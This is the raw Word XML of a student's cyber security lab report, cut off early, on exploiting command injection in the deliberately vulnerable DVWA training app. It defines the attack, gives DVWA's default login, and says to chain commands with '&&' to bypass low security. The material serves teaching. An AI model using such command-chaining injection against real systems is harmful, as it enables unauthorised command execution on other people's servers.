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2C0C3E" w14:textId="77777777" w:rsidR="008B6805" w:rsidRDefault="008B6805" w:rsidP="008B6805">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Goa Vidya </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>prasarak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> mandal’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74171D67" w14:textId="77777777" w:rsidR="008B6805" w:rsidRDefault="008B6805" w:rsidP="008B6805">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>G.G.P.R. College of Commerce &amp; Economics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B333E3F" w14:textId="77777777" w:rsidR="008B6805" w:rsidRDefault="008B6805" w:rsidP="008B6805">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Farmagudi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ponda Goa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018FEE27" w14:textId="77777777" w:rsidR="008B6805" w:rsidRDefault="008B6805" w:rsidP="008B6805">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="538CDDC0" w14:textId="7DC17419" w:rsidR="008B6805" w:rsidRDefault="008B6805" w:rsidP="008B6805">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F3E056" w14:textId="60663889" w:rsidR="008B6805" w:rsidRPr="008B6805" w:rsidRDefault="008B6805" w:rsidP="008B6805">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B6805">
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Name: Ankit Naik</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C32D119" w14:textId="67D19485" w:rsidR="008B6805" w:rsidRPr="008B6805" w:rsidRDefault="008B6805" w:rsidP="008B6805">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B6805">
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Admiossion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B6805">
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> no.:2105024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD8510B" w14:textId="453B2834" w:rsidR="008B6805" w:rsidRPr="008B6805" w:rsidRDefault="008B6805" w:rsidP="008B6805">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B6805">
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Roll no.:17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C27C451" w14:textId="6B9CE8DE" w:rsidR="00A629FA" w:rsidRPr="008B6805" w:rsidRDefault="008B6805" w:rsidP="008B6805">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Subject: </w:t>
      </w:r>
      <w:r w:rsidRPr="008B6805">
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>CYBER SECURITY ISA2(LAB)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B6805">
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDE5062" w14:textId="06D09D1B" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="225" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:eastAsia="Times New Roman" w:hAnsi="Josefin Sans" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Command Injection Exploitation in DVWA using Metasploit (Bypass All Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48223DED" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AE8F7A" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E6D6D9" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>First install the DVWA in your PC full article read </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00F12781">
          <w:rPr>
            <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16CD1568" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Now open the DVWA in your pc and login with following credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BAF0B3" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Username</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> – admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B0EC87" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> – password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786EC74A" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Bypass Low Level Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE05054" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>DVWA Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> and set Website </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Security Level low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54767677" w14:textId="77777777" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>“&amp;&amp;”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> in command injection to bypass low security of this server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAB85CD" w14:textId="34BD8572" w:rsidR="00F12781" w:rsidRPr="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
